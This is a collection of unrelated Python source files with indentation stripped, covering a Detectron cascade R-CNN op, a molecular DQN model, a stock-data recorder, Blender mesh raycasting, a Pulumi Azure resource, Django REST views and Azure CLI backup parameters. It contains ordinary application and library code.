# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
from detectron.core.config import cfg
from detectron.datasets import json_dataset
import detectron.modeling.FPN as fpn
import detectron.roi_data.cascade_rcnn as cascade_rcnn_roi_data
import detectron.utils.blob as blob_utils
class DistributeCascadeProposalsOp(object):
def __init__(self, train, stage):
self._train = train
self._stage = stage
def forward(self, inputs, outputs):
"""See modeling.detector.DistributeCascadeProposals for
inputs/outputs documentation.
"""
rois = inputs[0].data
if self._train:
# During training we reuse the data loader code. We populate roidb
# entries on the fly using the rois generated by RPN.
# im_info: [[im_height, im_width, im_scale], ...]
roidb = blob_utils.deserialize(inputs[1].data)
im_info = inputs[2].data
im_scales = im_info[:, 2]
# For historical consistency with the original Faster R-CNN
# implementation we are *not* filtering crowd proposals.
# This choice should be investigated in the future (it likely does
# not matter).
json_dataset.add_proposals(roidb, rois, im_scales, crowd_thresh=0)
# Compute training labels for the RPN proposals; also handles
# distributing the proposals over FPN levels
output_blob_names = cascade_rcnn_roi_data.get_cascade_rcnn_blob_names(
self._stage
)
blobs = {k: [] for k in output_blob_names}
# 进行rois映射到了合适的fpn层, 并重新进行采样构成训练数据
cascade_rcnn_roi_data.add_cascade_rcnn_blobs(
blobs, im_scales, roidb, self._stage
)
for i, k in enumerate(output_blob_names):
blob_utils.py_op_copy_blob(blobs[k], outputs[i])
else:
# For inference we have a special code path that avoids some data
# loader overhead
distribute(rois, None, outputs, self._train)
def distribute(rois, label_blobs, outputs, train):
"""To understand the output blob order see return value of
roi_data.cascade_rcnn.get_cascade_rcnn_blob_names(is_training=False)
"""
lvl_min = cfg.FPN.ROI_MIN_LEVEL
lvl_max = cfg.FPN.ROI_MAX_LEVEL
lvls = fpn.map_rois_to_fpn_levels(rois[:, 1:5], lvl_min, lvl_max)
outputs[0].reshape(rois.shape)
outputs[0].data[...] = rois
# Create new roi blobs for each FPN level
# (See: modeling.FPN.add_multilevel_roi_blobs which is similar but annoying
# to generalize to support this particular case.)
rois_idx_order = np.empty((0,))
for output_idx, lvl in enumerate(range(lvl_min, lvl_max + 1)):
idx_lvl = np.where(lvls == lvl)[0]
blob_roi_level = rois[idx_lvl, :]
outputs[output_idx + 1].reshape(blob_roi_level.shape)
outputs[output_idx + 1].data[...] = blob_roi_level
rois_idx_order = np.concatenate((rois_idx_order, idx_lvl))
rois_idx_restore = np.argsort(rois_idx_order)
blob_utils.py_op_copy_blob(rois_idx_restore.astype(np.int32), outputs[-1])
|
import torch
import torch.nn as nn
import torch.nn.functional as F
class MolDQN(nn.Module):
def __init__(self, input_length, output_length):
super(MolDQN, self).__init__()
self.linear_1 = nn.Linear(input_length, 1024)
self.linear_2 = nn.Linear(1024, 512)
self.linear_3 = nn.Linear(512, 128)
self.linear_4 = nn.Linear(128, 32)
self.linear_5 = nn.Linear(32, output_length)
self.activation = nn.ReLU()
def forward(self, x):
x = self.activation(self.linear_1(x))
x = self.activation(self.linear_2(x))
x = self.activation(self.linear_3(x))
x = self.activation(self.linear_4(x))
x = self.linear_5(x)
return x
|
# -*- coding: utf-8 -*-
import pandas as pd
from jqdatasdk import auth, logout, finance, query
from zvt.recorders.joinquant.common import to_jq_entity_id
from zvt import zvt_env
from zvt.api import TIME_FORMAT_DAY, get_str_schema
from zvt.contract.api import df_to_db
from zvt.contract.recorder import TimeSeriesDataRecorder
from zvt.domain import StockDetail,StockStatus
from zvt.utils.pd_utils import pd_is_not_null
from zvt.utils.time_utils import now_pd_timestamp, to_time_str
class JqChinaStockStatusRecorder(TimeSeriesDataRecorder):
entity_provider = 'joinquant'
entity_schema = StockDetail
# 数据来自jq
provider = 'joinquant'
data_schema = StockStatus
def __init__(self, entity_type='stock', exchanges=['sh', 'sz'], entity_ids=None, codes=None, batch_size=10,
force_update=False, sleeping_time=5, default_size=2000, real_time=False,
fix_duplicate_way='add', start_timestamp=None, end_timestamp=None, close_hour=0,
close_minute=0) -> None:
self.data_schema = StockStatus
super().__init__(entity_type, exchanges, entity_ids, codes, batch_size, force_update, sleeping_time,
default_size, real_time, fix_duplicate_way, start_timestamp, end_timestamp, close_hour,
close_minute)
# 调用登录函数(激活后使用,不需要用户名密码)
auth(zvt_env['jq_username'], zvt_env['jq_password'])
def on_finish(self):
super().on_finish()
logout()
def record(self, entity, start, end, size, timestamps):
if not end:
end = to_time_str(now_pd_timestamp())
start = to_time_str(start)
q = query(finance.STK_STATUS_CHANGE).filter(
finance.STK_STATUS_CHANGE.code == to_jq_entity_id(entity)).filter(
finance.STK_STATUS_CHANGE.pub_date >= to_time_str(start)).limit(10)
df = finance.run_query(q)
if pd_is_not_null(df):
df['pub_date'] = pd.to_datetime(df['pub_date'])
df['exchange'] = entity.exchange
df['entity_type'] = entity.entity_type
df['change_date'] = pd.to_datetime(df['change_date'])
df['timestamp'] = df['change_date']
df['entity_id'] = entity.id
df['provider'] = 'joinquant'
df['code'] = entity.code
def generate_finance_id(se):
return "{}_{}".format(se['entity_id'], to_time_str(se['timestamp'], fmt=TIME_FORMAT_DAY))
df['id'] = df[['entity_id', 'timestamp']].apply(generate_finance_id, axis=1)
df_to_db(df=df, data_schema=self.data_schema, provider=self.provider, force_update=self.force_update)
return None
__all__ = ['JqChinaStockStatusRecorder']
|
import time
import math
import bpy
import bmesh
import bgl
from typing import List, Callable
from mathutils import Vector, Matrix, Color, kdtree
from mathutils.bvhtree import BVHTree
from mathutils.geometry import intersect_point_line, intersect_line_plane
from bpy_extras import view3d_utils
from .maths import Point, Normal, XForm, Ray, Vector, Point2D
class XMesh:
def __init__(self, obj, triangulate=True):
self.obj = obj
self.xform = XForm(self.obj.matrix_world)
eme = self.obj.to_mesh(scene=bpy.context.scene, apply_modifiers=deform, settings='PREVIEW')
eme.update()
self.bme = bmesh.new()
self.bme.from_mesh(eme)
if triangulate: self.triangulate()
self.dirty()
def dirty(self):
self._dirty = True
def clean(self):
if not self._dirty: return
self.bme.verts.ensure_lookup_table()
self.bme.edges.ensure_lookup_table()
self.bme.faces.ensure_lookup_table()
self._bvh = BVHTree.FromBMesh(self.bme)
self._dirty = False
###################################################################################
# properties
###################################################################################
@property
def bvh(self):
self.clean()
return self._bvh
###################################################################################
# simple manipulations
###################################################################################
def triangulate(self):
faces = [face for face in self.bme.faces if len(face.verts) != 3]
#print('%d non-triangles' % len(faces))
bmesh.ops.triangulate(self.bme, faces=faces)
self.dirty()
###################################################################################
# ray casting functions
###################################################################################
def raycast(self, ray:Ray):
ray_local = self.xform.w2l_ray(ray)
p,n,i,d = self.bvh.ray_cast(ray_local.o, ray_local.d, ray_local.max)
if p is None: return (None,None,None,None)
if not self.get_bbox().Point_within(p, margin=1):
return (None,None,None,None)
p_w,n_w = self.xform.l2w_point(p), self.xform.l2w_normal(n)
d_w = (ray.o - p_w).length
return (p_w,n_w,i,d_w)
def raycast_all(self, ray:Ray):
l2w_point,l2w_normal = self.xform.l2w_point,self.xform.l2w_normal
ray_local = self.xform.w2l_ray(ray)
hits = []
origin,direction,maxdist = ray_local.o,ray_local.d,ray_local.max
dist = 0
while True:
p,n,i,d = self.bvh.ray_cast(origin, direction, maxdist)
if not p: break
p,n = l2w_point(p),l2w_normal(n)
d = (origin - p).length
dist += d
hits += [(p,n,i,dist)]
origin += direction * (d + 0.00001)
maxdist -= d
return hits
def raycast_hit(self, ray:Ray):
ray_local = self.xform.w2l_ray(ray)
p,n,i,d = self.bvh.ray_cast(ray_local.o, ray_local.d, ray_local.max)
return p is not None
###################################################################################
# nearest functions
###################################################################################
def nearest(self, point:Point, max_dist=float('inf')): #sys.float_info.max):
point_local = self.xform.w2l_point(point)
p,n,i,_ = self.bvh.find_nearest(point_local, max_dist)
if p is None: return (None,None,None,None)
p,n = self.xform.l2w_point(p), self.xform.l2w_normal(n)
d = (point - p).length
return (p,n,i,d)
def nearest_bmvert_Point(self, point:Point, verts=None):
if verts is None:
verts = self.bme.verts
else:
verts = [self._unwrap(bmv) for bmv in verts]
point_local = self.xform.w2l_point(point)
bv,bd = None,None
for bmv in verts:
d3d = (bmv.co - point_local).length
if bv is None or d3d < bd: bv,bd = bmv,d3d
bmv_world = self.xform.l2w_point(bv.co)
return (self._wrap_bmvert(bv),(point-bmv_world).length)
def nearest_bmverts_Point(self, point:Point, dist3d:float):
nearest = []
for bmv in self.bme.verts:
bmv_world = self.xform.l2w_point(bmv.co)
d3d = (bmv_world - point).length
if d3d > dist3d: continue
nearest += [(self._wrap_bmvert(bmv), d3d)]
return nearest
def nearest_bmedge_Point(self, point:Point, edges=None):
if edges is None:
edges = self.bme.edges
else:
edges = [self._unwrap(bme) for bme in edges]
l2w_point = self.xform.l2w_point
be,bd,bpp = None,None,None
for bme in self.bme.edges:
bmv0,bmv1 = l2w_point(bme.verts[0].co), l2w_point(bme.verts[1].co)
diff = bmv1 - bmv0
l = diff.length
d = diff / l
pp = bmv0 + d * max(0, min(l, (point - bmv0).dot(d)))
dist = (point - pp).length
if be is None or dist < bd: be,bd,bpp = bme,dist,pp
if be is None: return (None,None)
return (self._wrap_bmedge(be), (point-self.xform.l2w_point(bpp)).length)
def nearest_bmedges_Point(self, point:Point, dist3d:float):
l2w_point = self.xform.l2w_point
nearest = []
for bme in self.bme.edges:
bmv0,bmv1 = l2w_point(bme.verts[0].co), l2w_point(bme.verts[1].co)
diff = bmv1 - bmv0
l = diff.length
d = diff / l
pp = bmv0 + d * max(0, min(l, (point - bmv0).dot(d)))
dist = (point - pp).length
if dist > dist3d: continue
nearest += [(self._wrap_bmedge(bme), dist)]
return nearest
def nearest2D_bmverts_Point2D(self, xy:Point2D, dist2D:float, Point_to_Point2D, verts=None):
# TODO: compute distance from camera to point
# TODO: sort points based on 3d distance
if verts is None:
verts = self.bme.verts
else:
verts = [self._unwrap(bmv) for bmv in verts]
nearest = []
for bmv in verts:
p2d = Point_to_Point2D(self.xform.l2w_point(bmv.co))
if p2d is None: continue
if (p2d - xy).length > dist2D: continue
d3d = 0
nearest += [(self._wrap_bmvert(bmv), d3d)]
return nearest
def nearest2D_bmvert_Point2D(self, xy:Point2D, Point_to_Point2D, verts=None, max_dist=None):
if not max_dist or max_dist < 0: max_dist = float('inf')
# TODO: compute distance from camera to point
# TODO: sort points based on 3d distance
if verts is None:
verts = self.bme.verts
else:
verts = [self._unwrap(bmv) for bmv in verts]
l2w_point = self.xform.l2w_point
bv,bd = None,None
for bmv in verts:
p2d = Point_to_Point2D(l2w_point(bmv.co))
if p2d is None: continue
d2d = (xy - p2d).length
if d2d > max_dist: continue
if bv is None or d2d < bd: bv,bd = bmv,d2d
if bv is None: return (None,None)
return (self._wrap_bmvert(bv),bd)
def nearest2D_bmedges_Point2D(self, xy:Point2D, dist2D:float, Point_to_Point2D, edges=None, shorten=0.01):
# TODO: compute distance from camera to point
# TODO: sort points based on 3d distance
edges = self.bme.edges if edges is None else [self._unwrap(bme) for bme in edges]
l2w_point = self.xform.l2w_point
nearest = []
dist2D2 = dist2D**2
s0,s1 = shorten/2,1-shorten/2
proj = lambda bmv: Point_to_Point2D(l2w_point(bmv.co))
for bme in edges:
v0,v1 = proj(bme.verts[0]),proj(bme.verts[1])
l = v0.distance_to(v1)
if l == 0:
pp = v0
else:
d = (v1 - v0) / l
pp = v0 + d * max(l*s0, min(l*s1, d.dot(xy-v0)))
dist2 = pp.distance_squared_to(xy)
if dist2 > dist2D2: continue
nearest.append((self._wrap_bmedge(bme), math.sqrt(dist2)))
return nearest
def nearest2D_bmedge_Point2D(self, xy:Point2D, Point_to_Point2D, edges=None, shorten=0.01, max_dist=None):
if not max_dist or max_dist < 0: max_dist = float('inf')
if edges is None:
edges = self.bme.edges
else:
edges = [self._unwrap(bme) for bme in edges]
l2w_point = self.xform.l2w_point
be,bd,bpp = None,None,None
for bme in edges:
bmv0 = Point_to_Point2D(l2w_point(bme.verts[0].co))
bmv1 = Point_to_Point2D(l2w_point(bme.verts[1].co))
diff = bmv1 - bmv0
l = diff.length
if l == 0:
dist = (xy - bmv0).length
else:
d = diff / l
margin = l * shorten / 2
pp = bmv0 + d * max(margin, min(l-margin, (xy - bmv0).dot(d)))
dist = (xy - pp).length
if dist > max_dist: continue
if be is None or dist < bd: be,bd,bpp = bme,dist,pp
if be is None: return (None,None)
return (self._wrap_bmedge(be), (xy-bpp).length)
def nearest2D_bmfaces_Point2D(self, xy:Point2D, Point_to_Point2D, faces=None):
# TODO: compute distance from camera to point
# TODO: sort points based on 3d distance
if faces is None:
faces = self.bme.faces
else:
faces = [self._unwrap(bmf) for bmf in faces]
nearest = []
for bmf in faces:
pts = [Point_to_Point2D(self.xform.l2w_point(bmv.co)) for bmv in bmf.verts]
pts = [pt for pt in pts if pt]
pt0 = pts[0]
# TODO: Get dist?
for pt1,pt2 in zip(pts[1:-1],pts[2:]):
if intersect_point_tri(xy, pt0, pt1, pt2):
nearest += [(self._wrap_bmface(bmf), dist)]
#p2d = Point_to_Point2D(self.xform.l2w_point(bmv.co))
#d2d = (xy - p2d).length
#if p2d is None: continue
#if bv is None or d2d < bd: bv,bd = bmv,d2d
#if bv is None: return (None,None)
#return (self._wrap_bmvert(bv),bd)
return nearest
def nearest2D_bmface_Point2D(self, xy:Point2D, Point_to_Point2D, faces=None):
# TODO: compute distance from camera to point
# TODO: sort points based on 3d distance
if faces is None:
faces = self.bme.faces
else:
faces = [self._unwrap(bmf) for bmf in faces]
bv,bd = None,None
for bmf in faces:
pts = [Point_to_Point2D(self.xform.l2w_point(bmv.co)) for bmv in bmf.verts]
pts = [pt for pt in pts if pt]
pt0 = pts[0]
for pt1,pt2 in zip(pts[1:-1],pts[2:]):
if intersect_point_tri(xy, pt0, pt1, pt2):
return self._wrap_bmface(bmf)
#p2d = Point_to_Point2D(self.xform.l2w_point(bmv.co))
#d2d = (xy - p2d).length
#if p2d is None: continue
#if bv is None or d2d < bd: bv,bd = bmv,d2d
#if bv is None: return (None,None)
#return (self._wrap_bmvert(bv),bd)
return None
##########################################################
def _visible_verts(self, is_visible:Callable[[Point,Normal], bool]):
l2w_point, l2w_normal = self.xform.l2w_point, self.xform.l2w_normal
#is_vis = lambda bmv: is_visible(l2w_point(bmv.co), l2w_normal(bmv.normal))
is_vis = lambda bmv: is_visible(l2w_point(bmv.co), None)
return { bmv for bmv in self.bme.verts if is_vis(bmv) }
def _visible_edges(self, is_visible, bmvs=None):
if bmvs is None: bmvs = self._visible_verts(is_visible)
return { bme for bme in self.bme.edges if all(bmv in bmvs for bmv in bme.verts) }
def _visible_faces(self, is_visible, bmvs=None):
if bmvs is None: bmvs = self._visible_verts(is_visible)
return { bmf for bmf in self.bme.faces if all(bmv in bmvs for bmv in bmf.verts) }
def visible_verts(self, is_visible):
return { self._wrap_bmvert(bmv) for bmv in self._visible_verts(is_visible) }
def visible_edges(self, is_visible, verts=None):
bmvs = None if verts is None else { self._unwrap(bmv) for bmv in verts }
return { self._wrap_bmedge(bme) for bme in self._visible_edges(is_visible, bmvs=bmvs) }
def visible_faces(self, is_visible, verts=None):
bmvs = None if verts is None else { self._unwrap(bmv) for bmv in verts }
bmfs = { self._wrap_bmface(bmf) for bmf in self._visible_faces(is_visible, bmvs=bmvs) }
#print('seeing %d / %d faces' % (len(bmfs), len(self.bme.faces)))
return bmfs
|
class MockFile:
def read(self):
return False
class RequestHandler:
def __init__(self):
self.contentType = ""
self.contents = MockFile()
def getContents(self):
return self.contents.read()
def read(self):
return self.contents
def setStatus(self, status):
self.status = status
def getStatus(self):
return self.status
def getContentType(self):
return self.contentType
def getType(self):
return "static"
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['NotificationChannel']
class NotificationChannel(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
email_recipient: Optional[pulumi.Input[str]] = None,
events: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EventArgs']]]]] = None,
lab_name: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
notification_locale: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
web_hook_url: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
A notification.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: Description of notification.
:param pulumi.Input[str] email_recipient: The email recipient to send notifications to (can be a list of semi-colon separated email addresses).
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EventArgs']]]] events: The list of event for which this notification is enabled.
:param pulumi.Input[str] lab_name: The name of the lab.
:param pulumi.Input[str] location: The location of the resource.
:param pulumi.Input[str] name: The name of the notification channel.
:param pulumi.Input[str] notification_locale: The locale to use when sending a notification (fallback for unsupported languages is EN).
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: The tags of the resource.
:param pulumi.Input[str] web_hook_url: The webhook URL to send notifications to.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['description'] = description
__props__['email_recipient'] = email_recipient
__props__['events'] = events
if lab_name is None and not opts.urn:
raise TypeError("Missing required property 'lab_name'")
__props__['lab_name'] = lab_name
__props__['location'] = location
__props__['name'] = name
__props__['notification_locale'] = notification_locale
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
__props__['tags'] = tags
__props__['web_hook_url'] = web_hook_url
__props__['created_date'] = None
__props__['provisioning_state'] = None
__props__['type'] = None
__props__['unique_identifier'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:devtestlab:NotificationChannel"), pulumi.Alias(type_="azure-nextgen:devtestlab/latest:NotificationChannel"), pulumi.Alias(type_="azure-nextgen:devtestlab/v20160515:NotificationChannel")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(NotificationChannel, __self__).__init__(
'azure-nextgen:devtestlab/v20180915:NotificationChannel',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'NotificationChannel':
"""
Get an existing NotificationChannel resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return NotificationChannel(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="createdDate")
def created_date(self) -> pulumi.Output[str]:
"""
The creation date of the notification channel.
"""
return pulumi.get(self, "created_date")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
Description of notification.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="emailRecipient")
def email_recipient(self) -> pulumi.Output[Optional[str]]:
"""
The email recipient to send notifications to (can be a list of semi-colon separated email addresses).
"""
return pulumi.get(self, "email_recipient")
@property
@pulumi.getter
def events(self) -> pulumi.Output[Optional[Sequence['outputs.EventResponse']]]:
"""
The list of event for which this notification is enabled.
"""
return pulumi.get(self, "events")
@property
@pulumi.getter
def location(self) -> pulumi.Output[Optional[str]]:
"""
The location of the resource.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="notificationLocale")
def notification_locale(self) -> pulumi.Output[Optional[str]]:
"""
The locale to use when sending a notification (fallback for unsupported languages is EN).
"""
return pulumi.get(self, "notification_locale")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The provisioning status of the resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
The tags of the resource.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The type of the resource.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="uniqueIdentifier")
def unique_identifier(self) -> pulumi.Output[str]:
"""
The unique immutable identifier of a resource (Guid).
"""
return pulumi.get(self, "unique_identifier")
@property
@pulumi.getter(name="webHookUrl")
def web_hook_url(self) -> pulumi.Output[Optional[str]]:
"""
The webhook URL to send notifications to.
"""
return pulumi.get(self, "web_hook_url")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
|
import glob
import numpy as numpy
import cv2
import os
import random
label_list = glob.glob("./iafoss_data/256_filter/label/*.png")
file_list = glob.glob("./iafoss_data/256_filter/train/*.png")
assert len(label_list) == len(file_list), "error"
for i in range(len(label_list)):
label = cv2.imread(label_list[i], 0)
file = cv2.imread(file_list[i], 0)
print(label.sum())
if label.sum() == 0 and random.uniform(0,1) > 0.5:
os.remove(label_list[i])
os.remove(file_list[i])
|
from rest_framework import generics
from rest_framework.response import Response
from .request_dispatcher import dispatch_course_create_request
from .request_dispatcher import dispatch_course_get_request
from .request_dispatcher import (dispatch_student_create_request, dispatch_student_get_request,
dispatch_group_create_request, dispatch_group_get_request,
dispatch_update_student_details, dispatch_student_delete_request,
dispatch_assignment_get_request, dispatch_assignent_post_request)
from .request_dispatcher import (dispatch_course_delete_request, dispatch_group_delete_request,
dispatch_assignent_delete_request)
from .request_dispatcher import (dispatch_schedule_delete_request, dispatch_update_schedule_details,
dispatch_schedule_get_request, dispatch_schedule_create_request)
from .serializer import (CourseSerializer, GroupSerializer, StudentSerializer, AssignmentSerializer,
ScheduleSerializer)
error_response = {
"data": [],
"status": 1,
"message": "record"
}
class Course(generics.ListAPIView, generics.CreateAPIView):
"""
Course view
"""
def get(self, request, *args, **kwargs):
response = dispatch_course_get_request(request)
return Response(data=response)
def post(self, request, *args, **kwargs):
serializer = CourseSerializer(data=request.data)
if serializer.is_valid():
response = dispatch_course_create_request(request)
return Response(data=response['data'], status=response.get('status_code', 200))
else:
return Response(data=serializer.errors, status=400)
def delete(self, request, *args, **kwargs):
response = dispatch_course_delete_request(request)
return Response(data=response)
class Student(generics.ListAPIView, generics.CreateAPIView, generics.UpdateAPIView, generics.DestroyAPIView):
"""
Student view
"""
serializer_class = StudentSerializer
def get(self, request, *args, **kwargs):
response = dispatch_student_get_request(request)
return Response(data=response)
def post(self, request, *args, **kwargs):
serializer = StudentSerializer(data=request.data)
if serializer.is_valid():
response = dispatch_student_create_request(request)
return Response(data=response['data'], status=response.get('status_code', 200))
else:
return Response(data=serializer.errors, status=400)
def patch(self, request, *args, **kwargs):
response = dispatch_update_student_details(request)
return Response(data=response)
def delete(self, request, *args, **kwargs):
response = dispatch_student_delete_request(request)
status_code = None
if response:
status_code = 200
else:
status_code = 500
return Response(data=response, status=status_code)
class Schedule(generics.ListAPIView, generics.CreateAPIView, generics.UpdateAPIView, generics.DestroyAPIView):
"""
Schedule view
"""
serializer_class = ScheduleSerializer
def get(self, request, *args, **kwargs):
response = dispatch_schedule_get_request(request)
return Response(data=response)
def post(self, request, *args, **kwargs):
print(request.data)
serializer = ScheduleSerializer(data=request.data)
if serializer.is_valid():
response = dispatch_schedule_create_request(request)
return Response(data=response['data'], status=response.get('status_code', 200))
else:
return Response(data=serializer.errors, status=400)
def patch(self, request, *args, **kwargs):
response = dispatch_update_schedule_details(request)
return Response(data=response)
def delete(self, request, *args, **kwargs):
response = dispatch_schedule_delete_request(request)
status_code = None
if response:
status_code = 200
else:
status_code = 500
return Response(data=response, status=status_code)
class Group(generics.ListAPIView, generics.CreateAPIView):
"""
Group view
"""
def get(self, request, *args, **kwargs):
response = dispatch_group_get_request(request)
return Response(data=response)
def post(self, request, *args, **kwargs):
serializer = GroupSerializer(data=request.data)
if serializer.is_valid():
response = dispatch_group_create_request(serializer.data)
return Response(data=response['data'], status=response.get('status_code', 200))
else:
print(serializer.errors)
return Response(data=serializer.errors, status=400)
def delete(self, request, *args, **kwargs):
response = dispatch_group_delete_request(request)
status_code = None
if response:
status_code = 200
else:
status_code = 500
return Response(data=response, status=status_code)
class Assignment(generics.ListAPIView, generics.CreateAPIView):
"""
Assignment view
"""
def get(self, request, *args, **kwargs):
response = dispatch_assignment_get_request(request)
return Response(data=response)
def post(self, request, *args, **kwargs):
serializer = AssignmentSerializer(data=request.data)
if serializer.is_valid():
response = dispatch_assignent_post_request(serializer.data)
return Response(data=response['data'], status=response.get('status_code', 200))
else:
print(serializer.errors)
return Response(data=serializer.errors, status=400)
def delete(self, request, *args, **kwargs):
response = dispatch_assignent_delete_request(request)
return Response(data=response)
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=line-too-long
from argcomplete.completers import FilesCompleter
from knack.arguments import CLIArgumentType
import azure.cli.core.commands.arm # pylint: disable=unused-import
from azure.cli.core.commands.parameters import \
(get_resource_name_completion_list, file_type, get_three_state_flag,
get_enum_type, tags_type)
from azure.cli.core.commands.validators import get_default_location_from_resource_group
from azure.cli.command_modules.backup._validators import \
(datetime_type)
# ARGUMENT DEFINITIONS
allowed_container_types = ['AzureIaasVM']
allowed_workload_types = ['VM', 'AzureFileShare', 'SAPHANA', 'MSSQL', 'SAPHanaDatabase', 'SQLDataBase']
allowed_azure_workload_types = ['MSSQL', 'SAPHANA', 'SAPASE', 'SAPHanaDatabase', 'SQLDataBase']
allowed_backup_management_types = ['AzureIaasVM', 'AzureStorage', 'AzureWorkload']
allowed_extended_backup_management_types = allowed_backup_management_types + ['MAB']
allowed_protectable_item_type = ['SQLAG', 'SQLInstance', 'SQLDatabase', 'HANAInstance', 'SAPHanaDatabase', 'SAPHanaSystem']
allowed_target_tier_type_chk_archivable = ['VaultArchive']
allowed_tier_type = ['VaultStandard', 'Snapshot', 'VaultArchive', 'VaultStandardRehydrated', 'SnapshotAndVaultStandard', 'SnapshotAndVaultArchive']
allowed_rehyd_priority_type = ['Standard', 'High']
backup_management_type_help = """Specify the backup management type. Define how Azure Backup manages the backup of entities within the ARM resource. For eg: AzureWorkloads refers to workloads installed within Azure VMs, AzureStorage refers to entities within Storage account. Required only if friendly name is used as Container name."""
container_name_help = """Name of the backup container. Accepts 'Name' or 'FriendlyName' from the output of az backup container list command. If 'FriendlyName' is passed then BackupManagementType is required."""
workload_type_help = """Specify the type of applications within the Resource which should be discovered and protected by Azure Backup. """
restore_mode_help = """Specify the restore mode."""
resolve_conflict_help = "Instruction if there's a conflict with the restored data."
resource_id_help = """ID of the Azure Resource containing items to be protected by Azure Backup service. Currently, only Azure VM resource IDs are supported."""
policy_help = """JSON encoded policy definition. Use the show command with JSON output to obtain a policy object. Modify the values using a file editor and pass the object."""
target_server_type_help = """Specify the type of the server which should be discovered."""
protectable_item_name_type_help = """Specify the resource name to be protected by Azure Backup service."""
backup_type_help = """'Full, Differential, Log, CopyOnlyFull' for backup Item type 'MSSQL'. 'Full, Differential' for backup item type 'SAPHANA'."""
retain_until_help = """The date until which this backed up copy will be available for retrieval, in UTC (d-m-Y). For SQL workload, retain-until can only be specified for backup-type 'CopyOnlyFull'. For HANA workload, user can't specify the value for retain-until. If not specified, 30 days will be taken as default value or as decided by service."""
diskslist_help = """List of disks to be excluded or included."""
disk_list_setting_help = """option to decide whether to include or exclude the disk or reset any previous settings to default behavior"""
target_container_name_help = """The target container to which the DB recovery point should be downloaded as files."""
target_tier_help = """ The destination/target tier to which a particular recovery point has to be moved."""
tier_help = """ Provide 'tier' parameter to filter recovery points."""
rehyd_priority_type_help = """The type of priority to be maintained while rehydrating a recovery point """
infrastructure_encryption_type_help = """Use this parameter to enable/disable infrastructure encryption. This must be set when configuring encryption of the vault for the first time. Once enabled/disabled, infrastructure encryption setting cannot be changed. Default value: Disabled. Allowed values: Enabled, Disabled"""
vault_name_type = CLIArgumentType(help='Name of the Recovery services vault.', options_list=['--vault-name', '-v'], completer=get_resource_name_completion_list('Microsoft.RecoveryServices/vaults'))
container_name_type = CLIArgumentType(help=container_name_help, options_list=['--container-name', '-c'])
item_name_type = CLIArgumentType(help='Name of the backed up item.', options_list=['--item-name', '-i'])
policy_name_type = CLIArgumentType(help='Name of the backup policy.', options_list=['--policy-name', '-p'])
job_name_type = CLIArgumentType(help='Name of the job.', options_list=['--name', '-n'])
rp_name_type = CLIArgumentType(help='Name of the recovery point.', options_list=['--rp-name', '-r'])
